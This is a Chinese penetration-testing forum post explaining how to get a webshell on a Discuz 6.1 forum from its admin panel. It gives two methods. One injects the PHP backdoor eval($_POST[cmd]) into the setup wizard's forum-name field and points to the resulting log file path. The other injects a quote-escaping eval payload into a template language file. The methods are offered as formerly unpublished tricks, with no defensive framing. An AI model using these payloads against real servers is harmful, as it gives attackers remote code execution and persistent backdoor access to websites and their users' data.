找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 discuz6.1后台拿shell方法
返回列表 发新帖
查看: 2714|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell! z% d: L( A2 H: ?6 P' i
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下, i, |) s; S) T, @' ]
1:
2 x1 I% g' S  h7 h# T3 u( l, bhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
2 ~' [2 S0 x6 b/ U$ uadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell6 X- U, B4 L* R! Q
<?php eval($_POST[cmd]);?>6 z6 q% p* w% x2 u; o
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
+ k- m9 u, b/ W9 u/ N, d7 @- N
: X. b0 w. t/ Z8 i
% J+ n" Z9 F8 D0 p: n5 W8 z2:后台模板管理--默认模板套系--详情! o( h( ]+ H: O9 M
templates/default/actions.lang.php6 Z: p& t9 V+ N" K8 Z
jhackj\\');eval($_POST[cmd])?>;//
8 R) \1 O7 X1 P3 t- ^
- ]6 S1 R1 \* e( n, \3 q利用很简单,聪明的人一看就懂了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表